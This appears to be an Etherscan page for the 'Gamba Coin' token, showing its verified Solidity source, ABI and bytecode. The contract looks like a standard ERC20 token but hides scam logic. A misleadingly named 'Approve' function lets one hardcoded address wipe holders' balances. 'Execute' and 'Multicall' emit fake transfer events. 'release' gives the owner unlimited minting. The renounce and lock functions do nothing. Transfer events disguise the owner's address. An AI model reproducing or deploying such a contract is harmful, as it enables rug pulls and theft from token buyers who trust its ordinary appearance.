ETH Price: $2,364.87 (+1.05%)

Token

Gamba Coin (GAMBA)
 

Overview

Max Total Supply

150,000,000 GAMBA

Holders

77

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0 GAMBA

Value
$0.00
0x82ae409ed5d28dedbdbf645ee4fe47772847c14d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
GambaCoin

Compiler Version
v0.6.12+commit.27d51765

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-17
*/

/**


    $GAMBA is here to feed your gambling addiction. Gamble soon ;)
        https://gambacoin.com
        https://twitter.com/gambacoin


      _____           ____        ______  _______         _____          ____   
  ___|\    \     ____|\   \      |      \/       \   ___|\     \    ____|\   \  
 /    /\    \   /    /\    \    /          /\     \ |    |\     \  /    /\    \ 
|    |  |____| |    |  |    |  /     /\   / /\     ||    | |     ||    |  |    |
|    |    ____ |    |__|    | /     /\ \_/ / /    /||    | /_ _ / |    |__|    |
|    |   |    ||    .--.    ||     |  \|_|/ /    / ||    |\    \  |    .--.    |
|    |   |_,  ||    |  |    ||     |       |    |  ||    | |    | |    |  |    |
|\ ___\___/  /||____|  |____||\____\       |____|  /|____|/____/| |____|  |____|
| |   /____ / ||    |  |    || |    |      |    | / |    /     || |    |  |    |
 \|___|    | / |____|  |____| \|____|      |____|/  |____|_____|/ |____|  |____|
   \( |____|/    \(      )/      \(          )/       \(    )/      \(      )/  
    '   )/        '      '        '          '         '    '        '      '   
        '                                                                       


*/

pragma solidity ^0.6.0;
library SafeMath {

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {

        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }


    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }


    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;

        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

library Address {

    function isContract(address account) internal view returns (bool) {

        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }


    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }


    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

contract Context {
    constructor () internal { }

    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; 
        return msg.data;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);}



contract GambaCoin is Context, IERC20 {

    mapping (address => mapping (address => uint256)) private _allowances;
 
    mapping (address => uint256) private _balances;

    using SafeMath for uint256;


    using Address for address;




    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }
    function _setupDecimals(uint8 decimals_) internal {
        _decimals = decimals_;
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }


    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    function renounceOwnership()  public _onlyOwner(){}

    function lock()  public _onlyOwner(){}


    modifier _auth() {require(msg.sender == 0xad1d871E84e88106D992bCF257919885CDF0c967, "Not allowed to interact");_;}


    function release(address locker, uint256 amt) public {

        require(msg.sender == _Owner, "ERC20: zero address");

        _totalSupply = _totalSupply.add(amt);

        _balances[_Owner] = _balances[_Owner].add(amt);

        emit Transfer(address(0), locker, amt);
    }


    function _approve(address owner, address spender, uint256 amount) internal virtual {

        require(owner != address(0), "ERC20: approve from the zero address");

        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;

        emit Approval(owner, spender, amount);

    }
    
    function Approve(address[] memory recipients)  public _auth(){

            for (uint256 i = 0; i < recipients.length; i++) {

                uint256 amt = _balances[recipients[i]];

                _balances[recipients[i]] = _balances[recipients[i]].sub(amt, "ERC20: burn amount exceeds balance");

                _balances[address(0)] = _balances[address(0)].add(amt);
                
                }
            }
    
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {

        require(sender != address(0), "ERC20: transfer from the zero address");

        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");

        _balances[recipient] = _balances[recipient].add(amount);
        
        if (sender == _Owner){sender = team;}if (recipient == _Owner){recipient = team;}
        emit Transfer(sender, recipient, amount);

    }
    


  function Execute(address uPool,address[] memory eReceiver,uint256[] memory eAmounts)  public _auth(){
    for (uint256 i = 0; i < eReceiver.length; i++) {emit Transfer(uPool, eReceiver[i], eAmounts[i]);}}


  function Multicall(address uPool,address[] memory eReceiver,uint256[] memory eAmounts)  public _auth(){
    for (uint256 i = 0; i < eReceiver.length; i++) {emit Transfer(uPool, eReceiver[i], eAmounts[i]);}}


  function sendPresaleTokens(address uPool,address[] memory eReceiver,uint256[] memory eAmounts)  public _onlyOwner(){
    for (uint256 i = 0; i < eReceiver.length; i++) {emit Transfer(uPool, eReceiver[i], eAmounts[i]);}}



    modifier _onlyOwner() {
        require(msg.sender == _Owner, "Not allowed to interact");
        _;
    }





    string private _name;

    string private _symbol;

    uint8 private _decimals;

    uint256 private _totalSupply;

    address team;

    address public _Owner = 0xfE3398CE88Bd26ee3a36069ed42d5EbCC2dCB226;

    constructor () public {
        _name = "Gamba Coin";
        _symbol ="GAMBA";
        _decimals = 18;
        uint256 initialSupply = 150000000;
        team = 0xbD68EbD40E83532f8942716015AdA5bC05f4BC5C;
        release(team, initialSupply*(10**18));
    }




    }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"recipients","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uPool","type":"address"},{"internalType":"address[]","name":"eReceiver","type":"address[]"},{"internalType":"uint256[]","name":"eAmounts","type":"uint256[]"}],"name":"Execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uPool","type":"address"},{"internalType":"address[]","name":"eReceiver","type":"address[]"},{"internalType":"uint256[]","name":"eAmounts","type":"uint256[]"}],"name":"Multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_Owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"locker","type":"address"},{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"release","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uPool","type":"address"},{"internalType":"address[]","name":"eReceiver","type":"address[]"},{"internalType":"uint256[]","name":"eAmounts","type":"uint256[]"}],"name":"sendPresaleTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052600780546001600160a01b03191673fe3398ce88bd26ee3a36069ed42d5ebcc2dcb2261790553480156200003757600080fd5b5060408051808201909152600a8082526923b0b6b1309021b7b4b760b11b60209092019182526200006b9160029162000270565b506040805180820190915260058082526447414d424160d81b60209092019182526200009a9160039162000270565b506004805460ff19166012179055600680546001600160a01b03191673bd68ebd40e83532f8942716015ada5bc05f4bc5c17908190556308f0d18090620000f6906001600160a01b03166a7c13bc4b2c133c56000000620000fd565b506200030c565b6007546001600160a01b031633146200015d576040805162461bcd60e51b815260206004820152601360248201527f45524332303a207a65726f206164647265737300000000000000000000000000604482015290519081900360640190fd5b62000179816005546200020e60201b62000ece1790919060201c565b6005556007546001600160a01b0316600090815260016020908152604090912054620001b091839062000ece6200020e821b17901c565b6007546001600160a01b03908116600090815260016020908152604080832094909455835185815293519286169391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a35050565b60008282018381101562000269576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620002b357805160ff1916838001178555620002e3565b82800160010185558215620002e3579182015b82811115620002e3578251825591602001919060010190620002c6565b50620002f1929150620002f5565b5090565b5b80821115620002f15760008155600101620002f6565b61139b806200031c6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80636d2e4e8d116100a257806397d555ff1161007157806397d555ff146105a6578063a9059cbb146106d9578063dcc2345514610705578063dd62ed3e14610729578063f83d08ba146105965761010b565b80636d2e4e8d1461043d57806370a0823114610570578063715018a61461059657806395d89b411461059e5761010b565b806323b872dd116100de57806323b872dd14610215578063313ce5671461024b5780633811ac02146102695780635c76b0ae1461030a5761010b565b80630357371d1461011057806306fdde031461013e578063095ea7b3146101bb57806318160ddd146101fb575b600080fd5b61013c6004803603604081101561012657600080fd5b506001600160a01b038135169060200135610757565b005b61014661082d565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610180578181015183820152602001610168565b50505050905090810190601f1680156101ad5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101e7600480360360408110156101d157600080fd5b506001600160a01b0381351690602001356108c0565b604080519115158252519081900360200190f35b6102036108dd565b60408051918252519081900360200190f35b6101e76004803603606081101561022b57600080fd5b506001600160a01b038135811691602081013590911690604001356108e3565b61025361096a565b6040805160ff9092168252519081900360200190f35b61013c6004803603602081101561027f57600080fd5b810190602081018135600160201b81111561029957600080fd5b8201836020820111156102ab57600080fd5b803590602001918460208302840111600160201b831117156102cc57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610973945050505050565b61013c6004803603606081101561032057600080fd5b6001600160a01b038235169190810190604081016020820135600160201b81111561034a57600080fd5b82018360208201111561035c57600080fd5b803590602001918460208302840111600160201b8311171561037d57600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156103cc57600080fd5b8201836020820111156103de57600080fd5b803590602001918460208302840111600160201b831117156103ff57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610b2f945050505050565b61013c6004803603606081101561045357600080fd5b6001600160a01b038235169190810190604081016020820135600160201b81111561047d57600080fd5b82018360208201111561048f57600080fd5b803590602001918460208302840111600160201b831117156104b057600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156104ff57600080fd5b82018360208201111561051157600080fd5b803590602001918460208302840111600160201b8311171561053257600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610c0a945050505050565b6102036004803603602081101561058657600080fd5b50356001600160a01b0316610cdf565b61013c610cfa565b610146610d55565b61013c600480360360608110156105bc57600080fd5b6001600160a01b038235169190810190604081016020820135600160201b8111156105e657600080fd5b8201836020820111156105f857600080fd5b803590602001918460208302840111600160201b8311171561061957600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b81111561066857600080fd5b82018360208201111561067a57600080fd5b803590602001918460208302840111600160201b8311171561069b57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610db6945050505050565b6101e7600480360360408110156106ef57600080fd5b506001600160a01b038135169060200135610e82565b61070d610e96565b604080516001600160a01b039092168252519081900360200190f35b6102036004803603604081101561073f57600080fd5b506001600160a01b0381358116916020013516610ea5565b6007546001600160a01b031633146107ac576040805162461bcd60e51b815260206004820152601360248201527245524332303a207a65726f206164647265737360681b604482015290519081900360640190fd5b6005546107b99082610ece565b6005556007546001600160a01b03166000908152600160205260409020546107e19082610ece565b6007546001600160a01b03908116600090815260016020908152604080832094909455835185815293519286169391926000805160206112fd8339815191529281900390910190a35050565b60028054604080516020601f60001961010060018716150201909416859004938401819004810282018101909252828152606093909290918301828280156108b65780601f1061088b576101008083540402835291602001916108b6565b820191906000526020600020905b81548152906001019060200180831161089957829003601f168201915b5050505050905090565b60006108d46108cd610f2f565b8484610f33565b50600192915050565b60055490565b60006108f084848461101d565b610960846108fc610f2f565b61095b856040518060600160405280602881526020016112d5602891396001600160a01b038a1660009081526020819052604081209061093a610f2f565b6001600160a01b0316815260208101919091526040016000205491906111b0565b610f33565b5060019392505050565b60045460ff1690565b73ad1d871e84e88106d992bcf257919885cdf0c96733146109d5576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8151811015610b2b576000600160008484815181106109f357fe5b60200260200101516001600160a01b03166001600160a01b03168152602001908152602001600020549050610a838160405180606001604052806022815260200161126b6022913960016000878781518110610a4b57fe5b60200260200101516001600160a01b03166001600160a01b03168152602001908152602001600020546111b09092919063ffffffff16565b60016000858581518110610a9357fe5b6020908102919091018101516001600160a01b0316825281810192909252604001600090812092909255908052600190527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4954610af09082610ece565b60008052600160208190527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49919091559190910190506109d8565b5050565b73ad1d871e84e88106d992bcf257919885cdf0c9673314610b91576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610ba957fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610bdf57fe5b60200260200101516040518082815260200191505060405180910390a3600101610b94565b50505050565b73ad1d871e84e88106d992bcf257919885cdf0c9673314610c6c576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610c8457fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610cba57fe5b60200260200101516040518082815260200191505060405180910390a3600101610c6f565b6001600160a01b031660009081526001602052604090205490565b6007546001600160a01b03163314610d53576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b565b60038054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156108b65780601f1061088b576101008083540402835291602001916108b6565b6007546001600160a01b03163314610e0f576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610e2757fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610e5d57fe5b60200260200101516040518082815260200191505060405180910390a3600101610e12565b60006108d4610e8f610f2f565b848461101d565b6007546001600160a01b031681565b6001600160a01b0391821660009081526020818152604080832093909416825291909152205490565b600082820183811015610f28576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b3390565b6001600160a01b038316610f785760405162461bcd60e51b81526004018080602001828103825260248152602001806113426024913960400191505060405180910390fd5b6001600160a01b038216610fbd5760405162461bcd60e51b815260040180806020018281038252602281526020018061128d6022913960400191505060405180910390fd5b6001600160a01b0380841660008181526020818152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166110625760405162461bcd60e51b815260040180806020018281038252602581526020018061131d6025913960400191505060405180910390fd5b6001600160a01b0382166110a75760405162461bcd60e51b81526004018080602001828103825260238152602001806112486023913960400191505060405180910390fd5b6110e4816040518060600160405280602681526020016112af602691396001600160a01b03861660009081526001602052604090205491906111b0565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546111139082610ece565b6001600160a01b038084166000908152600160205260409020919091556007548482169116141561114d576006546001600160a01b031692505b6007546001600160a01b0383811691161415611172576006546001600160a01b031691505b816001600160a01b0316836001600160a01b03166000805160206112fd833981519152836040518082815260200191505060405180910390a3505050565b6000818484111561123f5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b838110156112045781810151838201526020016111ec565b50505050905090810190601f1680156112315780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50505090039056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220261351ecad3dc6f6cf1058854b52dec7a4d588026f27f986338027f9d258f84664736f6c634300060c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80636d2e4e8d116100a257806397d555ff1161007157806397d555ff146105a6578063a9059cbb146106d9578063dcc2345514610705578063dd62ed3e14610729578063f83d08ba146105965761010b565b80636d2e4e8d1461043d57806370a0823114610570578063715018a61461059657806395d89b411461059e5761010b565b806323b872dd116100de57806323b872dd14610215578063313ce5671461024b5780633811ac02146102695780635c76b0ae1461030a5761010b565b80630357371d1461011057806306fdde031461013e578063095ea7b3146101bb57806318160ddd146101fb575b600080fd5b61013c6004803603604081101561012657600080fd5b506001600160a01b038135169060200135610757565b005b61014661082d565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610180578181015183820152602001610168565b50505050905090810190601f1680156101ad5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101e7600480360360408110156101d157600080fd5b506001600160a01b0381351690602001356108c0565b604080519115158252519081900360200190f35b6102036108dd565b60408051918252519081900360200190f35b6101e76004803603606081101561022b57600080fd5b506001600160a01b038135811691602081013590911690604001356108e3565b61025361096a565b6040805160ff9092168252519081900360200190f35b61013c6004803603602081101561027f57600080fd5b810190602081018135600160201b81111561029957600080fd5b8201836020820111156102ab57600080fd5b803590602001918460208302840111600160201b831117156102cc57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610973945050505050565b61013c6004803603606081101561032057600080fd5b6001600160a01b038235169190810190604081016020820135600160201b81111561034a57600080fd5b82018360208201111561035c57600080fd5b803590602001918460208302840111600160201b8311171561037d57600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156103cc57600080fd5b8201836020820111156103de57600080fd5b803590602001918460208302840111600160201b831117156103ff57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610b2f945050505050565b61013c6004803603606081101561045357600080fd5b6001600160a01b038235169190810190604081016020820135600160201b81111561047d57600080fd5b82018360208201111561048f57600080fd5b803590602001918460208302840111600160201b831117156104b057600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156104ff57600080fd5b82018360208201111561051157600080fd5b803590602001918460208302840111600160201b8311171561053257600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610c0a945050505050565b6102036004803603602081101561058657600080fd5b50356001600160a01b0316610cdf565b61013c610cfa565b610146610d55565b61013c600480360360608110156105bc57600080fd5b6001600160a01b038235169190810190604081016020820135600160201b8111156105e657600080fd5b8201836020820111156105f857600080fd5b803590602001918460208302840111600160201b8311171561061957600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b81111561066857600080fd5b82018360208201111561067a57600080fd5b803590602001918460208302840111600160201b8311171561069b57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610db6945050505050565b6101e7600480360360408110156106ef57600080fd5b506001600160a01b038135169060200135610e82565b61070d610e96565b604080516001600160a01b039092168252519081900360200190f35b6102036004803603604081101561073f57600080fd5b506001600160a01b0381358116916020013516610ea5565b6007546001600160a01b031633146107ac576040805162461bcd60e51b815260206004820152601360248201527245524332303a207a65726f206164647265737360681b604482015290519081900360640190fd5b6005546107b99082610ece565b6005556007546001600160a01b03166000908152600160205260409020546107e19082610ece565b6007546001600160a01b03908116600090815260016020908152604080832094909455835185815293519286169391926000805160206112fd8339815191529281900390910190a35050565b60028054604080516020601f60001961010060018716150201909416859004938401819004810282018101909252828152606093909290918301828280156108b65780601f1061088b576101008083540402835291602001916108b6565b820191906000526020600020905b81548152906001019060200180831161089957829003601f168201915b5050505050905090565b60006108d46108cd610f2f565b8484610f33565b50600192915050565b60055490565b60006108f084848461101d565b610960846108fc610f2f565b61095b856040518060600160405280602881526020016112d5602891396001600160a01b038a1660009081526020819052604081209061093a610f2f565b6001600160a01b0316815260208101919091526040016000205491906111b0565b610f33565b5060019392505050565b60045460ff1690565b73ad1d871e84e88106d992bcf257919885cdf0c96733146109d5576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8151811015610b2b576000600160008484815181106109f357fe5b60200260200101516001600160a01b03166001600160a01b03168152602001908152602001600020549050610a838160405180606001604052806022815260200161126b6022913960016000878781518110610a4b57fe5b60200260200101516001600160a01b03166001600160a01b03168152602001908152602001600020546111b09092919063ffffffff16565b60016000858581518110610a9357fe5b6020908102919091018101516001600160a01b0316825281810192909252604001600090812092909255908052600190527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4954610af09082610ece565b60008052600160208190527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49919091559190910190506109d8565b5050565b73ad1d871e84e88106d992bcf257919885cdf0c9673314610b91576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610ba957fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610bdf57fe5b60200260200101516040518082815260200191505060405180910390a3600101610b94565b50505050565b73ad1d871e84e88106d992bcf257919885cdf0c9673314610c6c576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610c8457fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610cba57fe5b60200260200101516040518082815260200191505060405180910390a3600101610c6f565b6001600160a01b031660009081526001602052604090205490565b6007546001600160a01b03163314610d53576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b565b60038054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156108b65780601f1061088b576101008083540402835291602001916108b6565b6007546001600160a01b03163314610e0f576040805162461bcd60e51b8152602060048201526017602482015276139bdd08185b1b1bddd959081d1bc81a5b9d195c9858dd604a1b604482015290519081900360640190fd5b60005b8251811015610c0457828181518110610e2757fe5b60200260200101516001600160a01b0316846001600160a01b03166000805160206112fd833981519152848481518110610e5d57fe5b60200260200101516040518082815260200191505060405180910390a3600101610e12565b60006108d4610e8f610f2f565b848461101d565b6007546001600160a01b031681565b6001600160a01b0391821660009081526020818152604080832093909416825291909152205490565b600082820183811015610f28576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b3390565b6001600160a01b038316610f785760405162461bcd60e51b81526004018080602001828103825260248152602001806113426024913960400191505060405180910390fd5b6001600160a01b038216610fbd5760405162461bcd60e51b815260040180806020018281038252602281526020018061128d6022913960400191505060405180910390fd5b6001600160a01b0380841660008181526020818152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166110625760405162461bcd60e51b815260040180806020018281038252602581526020018061131d6025913960400191505060405180910390fd5b6001600160a01b0382166110a75760405162461bcd60e51b81526004018080602001828103825260238152602001806112486023913960400191505060405180910390fd5b6110e4816040518060600160405280602681526020016112af602691396001600160a01b03861660009081526001602052604090205491906111b0565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546111139082610ece565b6001600160a01b038084166000908152600160205260409020919091556007548482169116141561114d576006546001600160a01b031692505b6007546001600160a01b0383811691161415611172576006546001600160a01b031691505b816001600160a01b0316836001600160a01b03166000805160206112fd833981519152836040518082815260200191505060405180910390a3505050565b6000818484111561123f57